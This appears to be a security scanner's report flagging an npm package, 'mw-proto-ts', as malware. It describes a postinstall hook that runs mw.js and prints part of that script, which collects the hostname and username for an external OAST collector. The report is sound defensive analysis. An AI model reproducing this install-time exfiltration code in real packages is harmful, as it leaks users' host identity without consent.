AI Security Review
scanned 2h ago · by lpm-firewall-aiInstalling the package automatically executes `mw.js`. It fingerprints the host and sends the hostname and username to a third-party collector.
Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall during package installation
Impact
Discloses local host identity and username without user action.
Mechanism
install-time host fingerprint exfiltration over HTTPS
Attack narrative
`package.json` runs `node mw.js` automatically at postinstall. The script obtains `os.hostname()` and `os.userInfo().username`, places them in query parameters, and issues an HTTPS GET to an external OAST collector while suppressing errors. This is unconsented install-time host-data exfiltration.
Rationale
Direct source inspection confirms automatic postinstall execution and external transmission of local hostname and username. This is concrete malicious behavior, not a package-aligned feature.
Evidence
package.jsonmw.js
Network endpoints1
gdx35zc4m7hymba6asotmwhd349vxlla.oastify.com/beacon
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines `postinstall: node mw.js`.
- `mw.js` collects the local hostname and OS username.
- `mw.js` sends the collected identifiers to an external OAST endpoint during install.
- The request errors are silently ignored, and the package has no functional entrypoint.
Evidence against
Behavioral surface
Network
HighEntropyStringsTrivialUrlStrings
NoLicense
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node mw.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgmw.jsView file
1const os = require("os"), https = require("https");
L2: const COLLECTOR = "https://[redacted].oastify.com/beacon";
L3: const payload = new URLSearchParams({
L4: host: os.hostname(), user: os.userInfo().username, pkg: "mw-proto-ts",
L5: ts: new Date().toISOString()
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
mw.jsView on unpkg · L1Findings
2 High1 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationmw.js
MediumNetwork
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings
LowNo License